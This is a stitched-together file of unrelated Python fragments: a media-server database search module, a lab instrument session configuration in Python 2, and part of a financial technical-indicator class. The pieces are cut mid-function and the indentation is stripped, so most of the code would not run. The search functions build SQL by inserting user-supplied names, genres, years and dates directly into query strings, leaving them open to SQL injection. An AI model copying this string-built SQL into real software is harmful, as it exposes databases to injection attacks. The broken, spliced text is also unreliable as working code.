# {col1name:col1value,col2name:col2value, etc.},
# etc.]
#####################################################
def dictfetchall(cursor,sqltext,params=None):
""" Returns query results as list of dictionaries."""
result = []
if (params is None):
print(sqltext)
else:
print("we HAVE PARAMS!")
print_sql_string(sqltext,params)
cursor.execute(sqltext,params)
cols = [a[0].decode("utf-8") for a in cursor.description]
print(cols)
returnres = cursor.fetchall()
for row in returnres:
result.append({a:b for a,b in zip(cols, row)})
# cursor.close()
return result
def dictfetchone(cursor,sqltext,params=None):
""" Returns query results as list of dictionaries."""
# cursor = conn.cursor()
result = []
cursor.execute(sqltext,params)
cols = [a[0].decode("utf-8") for a in cursor.description]
    returnres = cursor.fetchone()
    if returnres is not None:
        result.append({a: b for a, b in zip(cols, returnres)})
return result
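The row-to-dict pattern shared by `dictfetchall`/`dictfetchone` can be isolated and checked without a live database; here `description` mimics the shape of `cursor.description` (column names already decoded to `str`):

```python
def rows_to_dicts(description, rows):
    # Same pattern as dictfetchall: pair each column name with its row value
    cols = [col[0] for col in description]
    return [dict(zip(cols, row)) for row in rows]

description = [("movie_id",), ("movie_title",)]
rows = [(1, "Heat"), (2, "Alien")]
result = rows_to_dicts(description, rows)
print(result)
# → [{'movie_id': 1, 'movie_title': 'Heat'}, {'movie_id': 2, 'movie_title': 'Alien'}]
```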
#####################################################
#####################################################
#####################################################
########### Additional Task - MEDIUM ###########
#####################################################
#####################################################
#####################################################
# Film Genre - Multi Term Search
#
#####################################################
def search_filmgenre_multi(inDict):
"""
Searches for matching film genre contents by given filters
Input Examples->
1. mediaType:movie,name:The Shawshank Redemption,genre:drama,year:>1993
2. mediaType:all,genre:drama,year:>2009
3. mediaType:tvshow,name:Friends
4. mediaType:movie,genre:drama,year :>1993
5. mediaType:tvshow, genre: drama
6. mediaType:movie ,genre :drama,year:BETWEEN 1993 AND 2009
7. mediaType:tvshowep
8. mediaType:tvshowep,epname:The One Where Monica Gets A Roommate
9. mediaType:tvshowep,showname:The Friends
10. mediaType:tvshowep,showname:Friends,episode:10
    11. mediaType:tvshowep,showname:Friends,season:1,episode:10
    12. mediaType:tvshowep,showname:Friends,season:2
"""
conn = database_connect()
if(conn is None):
return None
cur = conn.cursor()
try:
sql_template_movie = """SELECT M.movie_id as item_id, M.movie_title as item_title, 'Movie' as item_type
FROM mediaserver.movie M LEFT OUTER JOIN mediaserver.mediaitemmetadata mimd on (m.movie_id = mimd.media_id)
JOIN mediaserver.Metadata md on (mimd.md_id = md.md_id)
JOIN mediaserver.MetadataType mdt on (md.md_type_id = mdt.md_type_id)"""
sql_template_tvshow = """ SELECT T.tvshow_id as item_id, T.tvshow_title as item_title, 'TV Show' as item_type
FROM mediaserver.tvshow T left outer join mediaserver.TVEpisode TE on (T.tvshow_id = TE.tvshow_id)
JOIN mediaserver.TVShowMetaData TVMD on (TE.tvshow_id = TVMD.tvshow_id)
JOIN mediaserver.Metadata md on (TVMD.md_id = md.md_id)
JOIN mediaserver.MetadataType mdt on (md.md_type_id = mdt.md_type_id)"""
sql_template_tvshowep = """SELECT te.media_id as item_id, te.tvshow_episode_title as item_title, 'TV Show Episode' as item_type
FROM mediaserver.tvshow T left outer join mediaserver.TVEpisode te on (T.tvshow_id = te.tvshow_id)
left outer join
(mediaserver.mediaitemmetadata natural join mediaserver.metadata natural join mediaserver.MetaDataType) md
on (te.media_id=md.media_id)"""
sql_ending = """ group by item_id, item_title, item_type
order by item_id"""
where_clause = " WHERE md.md_type_id = 2 "
if inDict["mediaType"] == "movie":
if "name" in inDict:
where_clause = where_clause + "AND "+ "M.movie_title = '{}' ".format(inDict["name"])
if "genre" in inDict:
where_clause = where_clause + "AND " + "md.md_value = '{}' ".format(inDict["genre"])
if "year" in inDict:
where_clause = where_clause + "AND " + "M.release_year {} ".format(inDict["year"])
final_sql = sql_template_movie + where_clause + sql_ending
elif inDict["mediaType"] == "tvshow":
if "name" in inDict:
where_clause = where_clause + "AND "+ "T.tvshow_title = '{}' ".format(inDict["name"])
if "genre" in inDict:
where_clause = where_clause + "AND " + "md.md_value = '{}' ".format(inDict["genre"])
final_sql = sql_template_tvshow + where_clause + sql_ending
elif inDict["mediaType"] == "tvshowep":
where_clause = " WHERE md.md_type_id IN (2,3,4,5,6) "
if "epname" in inDict:
where_clause = where_clause + "AND " + "te.tvshow_episode_title = '{}' ".format(inDict["epname"])
if "season" in inDict and "showname" in inDict:
where_clause = where_clause + "AND " + "te.season = {} AND T.tvshow_title = '{}' ".format(inDict["season"],inDict["showname"])
if "episode" in inDict and "showname" in inDict:
where_clause = where_clause + "AND " + "te.episode = {} AND T.tvshow_title = '{}' ".format(inDict["episode"],inDict["showname"])
# if "date" in inDict:
# print("hi")
# if inputDict["date"][0] == '>' or inputDict['date'][0] == '<': #e.g., date:>2017-01-01
# where_clause = where_clause + " AND te.air_date {} '{}'".format(inputDict["date"][0], inputDict["date"][1:])
# elif inputDict["date"][0:2] == '>=' or inputDict['date'][0:2] == '<=': #e.g., publish_date:>=2017-01-01
# where_clause = where_clause + " AND te.air_date {} '{}'".format(inputDict["date"][0:2], inputDict["date"][2:])
# elif inputDict["date"].split()[0].lower() == 'between':
# where_clause = where_clause + " AND te.air_date BETWEEN '{}' AND '{}'".format(inputDict["date"].split()[1], inputDict["date"].split()[3])
# else: #e.g., publish_date:2018-01-11
# where_clause = where_clause + " AND te.air_date = '{}'".format(inputDict["date"])
final_sql = sql_template_tvshowep + where_clause + sql_ending
elif inDict["mediaType"] == "all":
where_clausem = ""
if "genre" in inDict:
where_clause = where_clause + "AND " + "md.md_value = '{}' ".format(inDict["genre"])
if "year" in inDict:
where_clausem = where_clause + "AND " + "M.release_year {} ".format(inDict["year"])
final_sql = "(" + sql_template_movie + where_clausem + sql_ending+")"+ " UNION " + "(" + sql_template_tvshow + where_clause + sql_ending+")"
r = dictfetchall(cur,final_sql)
print(r)
cur.close() # Close the cursor
conn.close() # Close the connection to the db
return r
    except Exception as err:
        # If there were any errors, print the error to the debug log and return None
        print("Error: couldn't search for the movie in Advanced Search:", err)
cur.close() # Close the cursor
conn.close() # Close the connection to the db
return None
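The search helpers above interpolate user input directly into SQL with `.format()`, which invites SQL injection. A minimal sketch of the safer alternative — collecting `%s` placeholders plus a matching params list that a pg8000-style cursor can execute — where `build_movie_filter` is a hypothetical helper, not part of this module:

```python
def build_movie_filter(in_dict):
    # Collect WHERE fragments with %s placeholders and a parallel params list,
    # instead of interpolating user input into the SQL string
    clauses, params = ["md.md_type_id = %s"], [2]
    if "name" in in_dict:
        clauses.append("M.movie_title = %s")
        params.append(in_dict["name"])
    if "genre" in in_dict:
        clauses.append("md.md_value = %s")
        params.append(in_dict["genre"])
    return " WHERE " + " AND ".join(clauses), params

sql, params = build_movie_filter({"name": "Alien", "genre": "drama"})
print(sql)
print(params)
```

The resulting pair would be passed as `cursor.execute(full_sql, params)`, letting the driver do the quoting.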
#####################################################
# Podcast Genre - Multi Term Search
#
#####################################################
def search_podcastep_podcast_multi(inputDict):
"""
Podcast – name of podcast and/or release date - Theresa
Podcast Ep – name of episode and/or release date
- name, publish_date, length
sample input:
mediaType: podcast, date : >2019-01-01
mediaType: all, date : 2019-01-01
mediaType: all, date : between 2018-01-01 and 2019-01-12, length: 4462
mediaType: podcastep, name: Fine Cotton Fiasco bonus episode
mediaType: all, date : between 2018-01-01 and 2019-01-01, length: > 300
"""
conn = database_connect()
if(conn is None):
return None
cur = conn.cursor()
sql_template_podcastep = """
SELECT distinct podep.media_id as item_id, podcast_episode_title as item_title, 'PodcastEp' as item_type
FROM mediaserver.podcastepisode podep LEFT OUTER JOIN
(mediaserver.mediaitemmetadata NATURAL JOIN mediaserver.metadata NATURAL JOIN mediaserver.metadatatype) mediamd
ON (podep.media_id = mediamd.media_id)
"""
sql_template_podcast = """
SELECT distinct pod.podcast_id as item_id, podcast_title as item_title, 'Podcast' as item_type
FROM mediaserver.podcast pod LEFT OUTER JOIN
(mediaserver.podcastmetadata NATURAL JOIN mediaserver.metadata NATURAL JOIN mediaserver.metadatatype) p_to_md
ON (pod.podcast_id = p_to_md.podcast_id)
"""
where_clause = " WHERE true" #podcast genre
endclause = " ORDER BY item_id"
if inputDict["mediaType"] == "podcastep":
if "name" in inputDict:
name = inputDict["name"].lower()
apostrophe_index = name.find("'")
if apostrophe_index >= 0:
name = name[:apostrophe_index] + "'" + name[apostrophe_index:]
where_clause = where_clause + " AND lower(podcast_episode_title) = '{}'".format(name)
if "date" in inputDict:
if inputDict["date"][0] == '>' or inputDict['date'][0] == '<': #e.g., publish_date:>2017-01-01
where_clause = where_clause + " AND podcast_episode_published_date {} '{}'".format(inputDict["date"][0], inputDict["date"][1:])
elif inputDict["date"][0:2] == '>=' or inputDict['date'][0:2] == '<=': #e.g., publish_date:>=2017-01-01
where_clause = where_clause + " AND podcast_episode_published_date {} '{}'".format(inputDict["date"][0:2], inputDict["date"][2:])
elif inputDict["date"].split()[0].lower() == 'between':
where_clause = where_clause + | |
<filename>VIP_modules/dictionaries/session.py
"""
This file lists all initial values that are used in building the VIP GUI.
We do so by assembling a large dictionary of dictionaries of dictionaries,
called 'Tree'. From this we construct the smaller 'default' dictionary of
dictionaries. The default session dictionary assembled in the VIP_class
definition is a copy of 'default'.
"""
################################################################################
try:
### This except-clause is needed if you want to execute this file directly
import dictionaries.hardware as hardware
except ImportError:
import hardware as hardware
print "(session.py, ImportError) It seems you executed the session file directly."
################################################################################ INSTRUMENT CLASSIFICATION
ZNB20s = ['ZNB_1'
,'ZNB_2'
]
SGS100As = ['SGS_31'
,'SGS_32'
,'SGS_33'
,'SGS_34'
,'SGS_35'
,'SGS_37'
,'SGS_40'
,'SGS_41'
]
################################################################################ MEASUREMENT INSTRUMENTS
VNA = {'ZVL_1' : {'B_continous' : 'OFF' #,'Cont_off/on' : 'OFF'
,'F_data_form' : 'MLOG'
,'F_VNA_mode' : 'MLOG'
,'R_freq_start' : '10820'
,'R_freq_stop' : '10840'
,'R_freq_source' : '15.5'
,'R_power_source' : '-10'
,'R_bandwidth' : '1'
,'N_sweep_points' : '2001'
,'N_averaging' : '1'
,'F_Sij' : 'S21'
,'F_unit_bandwidth' : 'MHz'
,'F_unit_freq' : 'MHz'
,'F_unit_freq_source' : 'MHz'
,'B_averaging' : 'OFF'
,'B_reference_osci' : 'INT'
,'B_connect' : 'DONT'
}
}
for instr_name in ZNB20s:
VNA[instr_name] = {'B_continous' : 'OFF' #,'Cont_off/on' : 'OFF'
,'F_data_form' : 'MLOG'
,'F_VNA_mode' : 'MLOG'
,'R_freq_start' : '10820'
,'R_freq_stop' : '10840'
,'R_freq_source' : '15.5'
,'R_power_source' : '-10'
,'R_bandwidth' : '1'
,'N_sweep_points' : '2001'
,'N_averaging' : '1'
,'F_Sij' : 'S43'
,'F_unit_bandwidth' : 'MHz'
,'F_unit_freq' : 'MHz'
,'F_unit_freq_source' : 'MHz'
,'B_averaging' : 'OFF'
,'B_reference_osci' : 'INT'
,'B_connect' : 'DONT'
}
##########----------------------------------------------------------------------
SA = {'FSW_1' : {'R_freq_start' : '10820'
,'R_freq_stop' : '10840'
,'R_bandwidth' : '1'
,'R_time_stop' : '10'
,'N_sweep_points' : '2001'
,'N_averaging' : '1'
,'F_unit_freq' : 'MHz'
,'F_unit_time' : 'ms'
,'F_unit_bandwidth' : 'MHz'
,'F_averaging_type' : 'LINear'
,'F_averaging_mode' : 'RMS'
,'B_continous' : 'OFF'
,'B_power_meas' : 'OFF'
,'B_reference_osci' : 'INT'
,'B_connect' : 'DONT'
,'B_averaging' : 'OFF'
}
}
##########----------------------------------------------------------------------
Osci = {'RTE1054_1' : {'N_sweep_points' : '5000'
,'N_resolution' : '2'
,'N_time_range' : str(int('5000') * int('2'))
,'S_time_unit' : 'E-12' # pico second
,'S_Acquire_mode' : 'RESolution'
,'B_connect' : 'DONT'
}
}
##########----------------------------------------------------------------------
Laser = {'Santec_1' : {'R_Wave_value' : '1550.135'
,'R_Freq_value' : '193.5300'
,'R_Pow_dBm_value' : '-10'
,'R_Pow_mW_value' : '0.1'
,'B_connect' : 'DONT'
,'B_Shutter' : 'SC'
,'F_freq_or_wave' : 'FREQ'
,'F_dBm_or_mW' : 'DBM'
}
}
##########----------------------------------------------------------------------
WM = {'WM1210_1' : {'S_device_key' : '<KEY>' ### Wavelengthmeter
,'R_sleep_time' : '0.2'
,'R_dWavelength' : '0.0'
,'R_dPower' : '0.0'
,'B_connect' : 'DONT'
}
}
##########----------------------------------------------------------------------
PM = {'Thorlabs_1' : {'N_averaging' : '100' ### Powermeter
,'B_connect' : 'DONT'
}
}
##########----------------------------------------------------------------------
Dig = {'ATS9870_1' : {'N_records_per_buffer' : '250'
,'N_buffers_per_acquisition' : '400'
,'N_trigger_level_1' : '160'
,'N_trigger_delay' : '0'
,'F_trigger_source_1' : 'External'
,'F_channelA_range' : '0.04'
,'F_channelB_range' : '0.04'
,'F_channelA_coupling' : 'AC'
,'F_channelB_coupling' : 'AC'
,'F_trigger_edge_1' : 'POSITIVE'
,'F_use_channel' : 'A'
,'N_sweep_points' : '404'
,'F_decimation' : '405'
,'R_intermediate_frequency' : '0' ###MHZ
,'R_filter_frequency' : '0' ###MHZ
,'B_connect' : 'DONT'
}
,'NI_DAQ_1' : {'N_buffers_per_acquisition' : '400'
,'B_connect' : 'DONT'
}
}
################################################################################ SOURCE INSTRUMENTS
SG = {}
for instr_name in SGS100As:
SG[instr_name] = {'R_power_source' : '0'
,'R_freq_source' : '8'
,'R_phas_source' : '0'
,'F_unit_freq_source' : 'GHz'
,'B_output' : 'OFF'
,'B_reference_osci' : 'EXT'
,'B_connect' : 'DONT'
}
##########----------------------------------------------------------------------
AWG = {'H3344_1' : {'B_connect' : 'DONT'
,'R_amplitude_0' : '0.1'
,'R_amplitude_1' : '0.1'
,'R_amplitude_2' : '0.1'
,'R_amplitude_3' : '0.1'
,'R_offset_0' : "0"
,'R_offset_1' : "0"
,'R_offset_2' : "0"
,'R_offset_3' : "0"
,'B_use_trigger' : "ON"
                   ,'FILE_PATH_waveform_0' : r"E:\Measurement_Software\VIP\Data\Waveforms\dummy_name1.csv" # raw strings keep Windows backslashes literal
                   ,'FILE_PATH_waveform_1' : r"E:\Measurement_Software\VIP\Data\Waveforms\Generated_waveforms\gaussian_matilda_short004.csv"
                   ,'FILE_PATH_waveform_2' : r"E:\Measurement_Software\VIP\Data\Waveforms\dummy_name3.csv"
                   ,'FILE_PATH_waveform_3' : r"E:\Measurement_Software\VIP\Data\Waveforms\dummy_name4.csv"
}
}
for ch in hardware.range_H3344_channels:
k = 'B_channel_'+ch
AWG['H3344_1'][k] = 'OFF'
##########----------------------------------------------------------------------
NI_pulse = {'NI_pulse_1' : {'R_pulse_time' : '40'
,'F_unit_time' : 'ms'
,'F_use_config' : '2: Spec - Fridge - SA'
,'N_device' : '1'
,'N_port' : '0'
,'B_connect' : 'DONT'
}
}
for sk in NI_pulse:
NI_pulse[sk].update(hardware.NI_pulse)
for p in hardware.range_NI_pins:
NI_pulse[sk]['B_pin_'+p] = '0'
##########----------------------------------------------------------------------
Delft = {'Delft_1' : {'F_interface' : 'COM1'
,'F_polarity' : 'R_BIP'
,'F_channel' : '3'
,'B_connect' : 'DONT'
}
}
range_DACs = [str(i) for i in range(1, 1+int(hardware.Delft['N_DACs']))]
zero_init_mvolts = {'R_volt_channel_'+i : '0' for i in range_DACs}
for sk in Delft:
Delft[sk].update(hardware.Delft)
Delft[sk].update(zero_init_mvolts)
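The Delft block above layers its defaults with successive `update()` calls: per-instrument base settings, then `hardware.Delft`, then one zeroed `'R_volt_channel_<i>'` entry per DAC. A self-contained sketch of that layering (`hardware_delft` is a stand-in for `hardware.Delft`, assumed here to report 4 DACs):

```python
base = {"F_interface": "COM1", "B_connect": "DONT"}
hardware_delft = {"N_DACs": "4"}  # hypothetical stand-in for hardware.Delft
range_dacs = [str(i) for i in range(1, 1 + int(hardware_delft["N_DACs"]))]
zero_volts = {"R_volt_channel_" + i: "0" for i in range_dacs}
# Later update() calls win on key collisions, so the hardware values and
# zeroed channel voltages overlay the base defaults
base.update(hardware_delft)
base.update(zero_volts)
channels = sorted(k for k in base if k.startswith("R_volt_channel_"))
print(channels)
```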
################################################################################ SCRIPTS
Scripts = {'Freq. vs. drive power' : {"Sweep_instr" : "SGS_33"
,"VNA_instr" : "ZNB_1"
,"R_freq_cavity_VNA" : "7.9524" # GHz
,"R_freq_span_cavity_VNA": "100" # Hz
,"R_power_SG" : "-40" # Hz
,"R_freq_start_SG" : "11.2" # GHz
,"R_freq_stop_SG" : "11.4" # GHz
,"R_freq_step_size_SG" : "0.1" # GHz
,"R_power_start_SG" : "-40" # GHz
,"R_power_stop_SG" : "-20" # GHz
,"R_power_step_size_SG" : "10" # GHz
}
,"Printer demo" : {'string_to_print' : '...this is the "Printer Demo" LineEdit string :)'}
,"Freq. query" : {'TITLE_instr_name' : 'SGS_32'}
,"Mixer calib." : {"center_freq" : "10"
,"int_freq" : "0"
,'R_amplitude' : "0.5"
,'LO_source' : 'SGS_31'
,'spec_source' : 'SGS_31'
}
,'Mixer-Dig VNA' : {"start_freq" : "6000000000"
,"stop_freq" : "12000000000"
,"points" : "301"
,"IF_freq" : "100000000"
,"source_LO" : 'SGS_32'
,"source_rf" : 'SGS_31'
}
,"Flux sweep" : {"vna_ip" : 'ZNB_1'
,"ssg_ip" : 'SGS_33'
,"com_port" : "1"
,"dac_port" : "1"
,"cav_freq" : "7.953"
,"span" : "10"
,"pow" : "-40"
,"start_freq" : "10"
,"stop_freq" : "12"
,"step_size_ssg" : "0.1"
,"start_flux" : "0"
,"stop_flux" : "1"
,"step_size_srs" : "0.1"
,"fn" : "test_file_name"
}
}
################################################################################ SWEEPS
Sweep_1 = {'Power sweep 1' : {'R__start' : '-20'
,'R__stop' : '0'
,'N__sweep_points' : '5'
,'F__unit_sweep' : '~dBm'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'ZNB_1'
}
,'Freq. sweep 1' : {'R__start' : '2'
,'R__stop' : '8'
,'N__sweep_points' : '3'
,'F__unit_sweep' : 'GHz'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_33'
}
,'Voltage sweep 1' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~mV'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'Delft_1'
}
,'Phase sweep 1' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~Degree'
,'F_axis_mode' : 'Linear'
,'F_instr_name' : 'SGS_32'
}
           ,'File sweep 1'     : {'DIR__PATH'         : r'E:\Measurement_Software\VIP\Data\Waveforms'
,'FILE__NAME_0' : 'dummy_name'
,'CHANNEL__SWEEP_0' : '0'
,'FILE__NAME_1' : 'dummy_name'
,'CHANNEL__SWEEP_1' : '1'
,'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '1'
,'F__unit_sweep' : '~'
,'F_axis_mode' : 'dBm' ### don't change
,'F_instr_name' : 'H3344_1'
}
,'AWG sweep 1' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~V'
,'F__sweep_type' : 'Amplitude'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'H3344_1'
}
,'From trace' : {
}
}
##########----------------------------------------------------------------------
Sweep_2 = {'Power sweep 2' : {'R__start' : '-99'
,'R__stop' : '0'
,'N__sweep_points' : '5'
,'F__unit_sweep' : '~dBm'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'ZNB_1'
}
,'Freq. sweep 2' : {'R__start' : '2'
,'R__stop' : '8'
,'N__sweep_points' : '3'
,'F__unit_sweep' : 'GHz'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_34'
}
,'Voltage sweep 2' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~mV'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'Delft_1'
}
,'Phase sweep 2' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~Deg'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_32'
}
           ,'File sweep 2'     : {'DIR__PATH'         : r'E:\Measurement_Software\VIP\Data\Waveforms'
,'FILE__NAME_0' : 'dummy_name'
,'CHANNEL__SWEEP_0' : '0'
,'FILE__NAME_1' : 'dummy_name'
,'CHANNEL__SWEEP_1' : '1'
,'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '1'
,'F__unit_sweep' : '~'
,'F_axis_mode' : 'dBm' ### don't change
,'F_instr_name' : 'H3344_1'
}
,'AWG sweep 2' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~V'
,'F__sweep_type' : 'Amplitude'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'H3344_1'
}
}
##########----------------------------------------------------------------------
Sweep_3 = {'Power sweep 3' : {'R__start' : '-20'
,'R__stop' : '0'
,'N__sweep_points' : '5'
,'F__unit_sweep' : '~dBm'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'ZNB_1'
}
,'Freq. sweep 3' : {'R__start' : '2'
,'R__stop' : '8'
,'N__sweep_points' : '3'
,'F__unit_sweep' : 'GHz'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_34'
}
,'Voltage sweep 3' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~mV'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'Delft_1'
}
,'Phase sweep 3' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~Deg'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'SGS_32'
}
           ,'File sweep 3'     : {'DIR__PATH'         : r'E:\Measurement_Software\VIP\Data\Waveforms'
,'FILE__NAME_0' : 'dummy_name'
,'CHANNEL__SWEEP_0' : '0'
,'FILE__NAME_1' : 'dummy_name'
,'CHANNEL__SWEEP_1' : '1'
,'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '1'
,'F__unit_sweep' : '~'
,'F_axis_mode' : 'dBm' ### don't change
,'F_instr_name' : 'H3344_1'
}
,'AWG sweep 3' : {'R__start' : '0'
,'R__stop' : '0'
,'N__sweep_points' : '3'
,'F__unit_sweep' : '~V'
,'F__sweep_type' : 'Amplitude'
,'F_axis_mode' : 'dBm'
,'F_instr_name' : 'H3344_1'
}
}
for ch in hardware.range_H3344_channels:
k = 'USE_channel_'+ch
Sweep_1['AWG sweep 1'][k] = 'DONT_USE'
Sweep_2['AWG sweep 2'][k] = 'DONT_USE'
Sweep_3['AWG sweep 3'][k] = 'DONT_USE'
################################################################################ CONTROL
Points = {'Power point' : {'F_instr_name' | |
DataFrame:
"""BASP indicator serves to identify buying and selling pressure."""
sp = ohlc["high"] - ohlc["close"]
bp = ohlc["close"] - ohlc["low"]
spavg = sp.ewm(span=period, adjust=adjust).mean()
bpavg = bp.ewm(span=period, adjust=adjust).mean()
nbp = bp / bpavg
nsp = sp / spavg
varg = ohlc["volume"].ewm(span=period, adjust=adjust).mean()
nv = ohlc["volume"] / varg
nbfraw = pd.Series(nbp * nv, name="Buy.")
nsfraw = pd.Series(nsp * nv, name="Sell.")
return pd.concat([nbfraw, nsfraw], axis=1)
@classmethod
def BASPN(cls, ohlc: DataFrame, period: int = 40, adjust: bool = True) -> DataFrame:
"""
Normalized BASP indicator
"""
sp = ohlc["high"] - ohlc["close"]
bp = ohlc["close"] - ohlc["low"]
spavg = sp.ewm(span=period, adjust=adjust).mean()
bpavg = bp.ewm(span=period, adjust=adjust).mean()
nbp = bp / bpavg
nsp = sp / spavg
varg = ohlc["volume"].ewm(span=period, adjust=adjust).mean()
nv = ohlc["volume"] / varg
nbf = pd.Series((nbp * nv).ewm(span=20, adjust=adjust).mean(), name="Buy.")
nsf = pd.Series((nsp * nv).ewm(span=20, adjust=adjust).mean(), name="Sell.")
return pd.concat([nbf, nsf], axis=1)
@classmethod
def CMO(
cls,
ohlc: DataFrame,
period: int = 9,
factor: int = 100,
column: str = "close",
adjust: bool = True,
) -> DataFrame:
"""
Chande Momentum Oscillator (CMO) - technical momentum indicator invented by the technical analyst <NAME>.
It is created by calculating the difference between the sum of all recent gains and the sum of all recent losses and then
dividing the result by the sum of all price movement over the period.
        This oscillator is similar to other momentum indicators such as the Relative Strength Index and the Stochastic Oscillator
        because it is range-bound (between +100 and -100)."""
# get the price diff
delta = ohlc[column].diff()
# positive gains (up) and negative gains (down) Series
up, down = delta.copy(), delta.copy()
up[up < 0] = 0
down[down > 0] = 0
# EMAs of ups and downs
_gain = up.ewm(com=period, adjust=adjust).mean()
_loss = down.ewm(com=period, adjust=adjust).mean().abs()
return pd.Series(factor * ((_gain - _loss) / (_gain + _loss)), name="CMO")
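For a quick intuition check of the gain/loss ratio above, here is a pure-Python sketch of the classic rolling-sum CMO. Note this hypothetical `simple_cmo` sums raw gains and losses over the window rather than applying the EMA smoothing the method above uses, so the numbers differ from `CMO()`:

```python
def simple_cmo(prices, period=9):
    # Split consecutive differences into gains and losses over the window,
    # then scale the normalized difference to the +/-100 range
    deltas = [b - a for a, b in zip(prices, prices[1:])]
    gains = sum(d for d in deltas[-period:] if d > 0)
    losses = sum(-d for d in deltas[-period:] if d < 0)
    if gains + losses == 0:
        return 0.0
    return 100.0 * (gains - losses) / (gains + losses)

print(simple_cmo([10.0, 11.0, 10.5, 11.5, 12.0]))
```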
@classmethod
def CHANDELIER(
cls,
ohlc: DataFrame,
short_period: int = 22,
long_period: int = 22,
k: int = 3,
) -> DataFrame:
"""
Chandelier Exit sets a trailing stop-loss based on the Average True Range (ATR).
The indicator is designed to keep traders in a trend and prevent an early exit as long as the trend extends.
Typically, the Chandelier Exit will be above prices during a downtrend and below prices during an uptrend.
"""
l = pd.Series(
ohlc["high"].rolling(window=long_period).max() - cls.ATR(ohlc, 22) * k,
name="Long.",
)
s = pd.Series(
ohlc["low"].rolling(window=short_period).min() + cls.ATR(ohlc, 22) * k,
name="Short.",
)
return pd.concat([s, l], axis=1)
@classmethod
def QSTICK(cls, ohlc: DataFrame, period: int = 14) -> Series:
"""
        QStick indicator shows the dominance of black (down) or white (up) candlesticks
        (rendered red and green on most charts), as measured by the average
        open-to-close change over each of the past N days."""
_close = ohlc["close"].tail(period)
_open = ohlc["open"].tail(period)
return pd.Series(
(_close - _open) / period, name="{0} period QSTICK.".format(period)
)
@classmethod
def TMF(cls, ohlcv: DataFrame, period: int = 21) -> Series:
"""Indicator by <NAME> which improves upon CMF.
source: https://user42.tuxfamily.org/chart/manual/Twiggs-Money-Flow.html"""
ohlcv["ll"] = [min(l, c) for l, c in zip(ohlcv["low"], ohlcv["close"].shift(1))]
ohlcv["hh"] = [
max(h, c) for h, c in zip(ohlcv["high"], ohlcv["close"].shift(1))
]
ohlcv["range"] = (
2 * ((ohlcv["close"] - ohlcv["ll"]) / (ohlcv["hh"] - ohlcv["ll"])) - 1
)
ohlcv["rangev"] = None
# TMF Signal Line = EMA(TMF)
# return TMF
raise NotImplementedError
@classmethod
def WTO(
cls,
ohlc: DataFrame,
channel_length: int = 10,
average_length: int = 21,
adjust: bool = True,
) -> DataFrame:
"""
Wave Trend Oscillator
source: http://www.fxcoaching.com/WaveTrend/
"""
ap = cls.TP(ohlc)
esa = ap.ewm(span=channel_length, adjust=adjust).mean()
d = pd.Series(
(ap - esa).abs().ewm(span=channel_length, adjust=adjust).mean(), name="d"
)
ci = (ap - esa) / (0.015 * d)
wt1 = pd.Series(ci.ewm(span=average_length, adjust=adjust).mean(), name="WT1.")
wt2 = pd.Series(wt1.rolling(window=4).mean(), name="WT2.")
return pd.concat([wt1, wt2], axis=1)
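A step-by-step WaveTrend run on toy data, mirroring the pipeline above; the typical price is taken as (high + low + close) / 3, which is the usual definition and assumed to match the class's `TP` helper:

```python
import pandas as pd

ohlc = pd.DataFrame({
    "high":  [10.0, 11.0, 12.0, 11.5, 12.5, 13.0],
    "low":   [ 9.0, 10.0, 10.5, 10.0, 11.0, 12.0],
    "close": [ 9.5, 10.5, 11.5, 11.0, 12.0, 12.5],
})
ap = (ohlc["high"] + ohlc["low"] + ohlc["close"]) / 3  # typical price
esa = ap.ewm(span=3).mean()                            # smoothed price
d = (ap - esa).abs().ewm(span=3).mean()                # smoothed deviation
ci = (ap - esa) / (0.015 * d)                          # normalized oscillator
wt1 = ci.ewm(span=4).mean()
wt2 = wt1.rolling(window=4).mean()
# The series trends upward, so the oscillator ends positive.
```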
@classmethod
def FISH(cls, ohlc: DataFrame, period: int = 10, adjust: bool = True) -> Series:
"""
Fisher Transform was presented by <NAME>. It assumes that price distributions behave like square waves.
"""
from numpy import log, seterr
seterr(divide="ignore")
med = (ohlc["high"] + ohlc["low"]) / 2
ndaylow = med.rolling(window=period).min()
ndayhigh = med.rolling(window=period).max()
raw = (2 * ((med - ndaylow) / (ndayhigh - ndaylow))) - 1
smooth = raw.ewm(span=5, adjust=adjust).mean()
_smooth = smooth.fillna(0)
return pd.Series(
(log((1 + _smooth) / (1 - _smooth))).ewm(span=3, adjust=adjust).mean(),
name="{0} period FISH.".format(period),
)
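A compact walk-through of the transform on toy data. Clipping the smoothed series (an addition here, not in the method above) avoids the division-by-zero that the `seterr(divide="ignore")` call silences when the normalized price saturates at exactly ±1:

```python
import numpy as np
import pandas as pd

ohlc = pd.DataFrame({
    "high": [10.0, 10.5, 11.0, 11.5, 12.0],
    "low":  [ 9.0,  9.5, 10.0, 10.5, 11.0],
})
period = 2
med = (ohlc["high"] + ohlc["low"]) / 2
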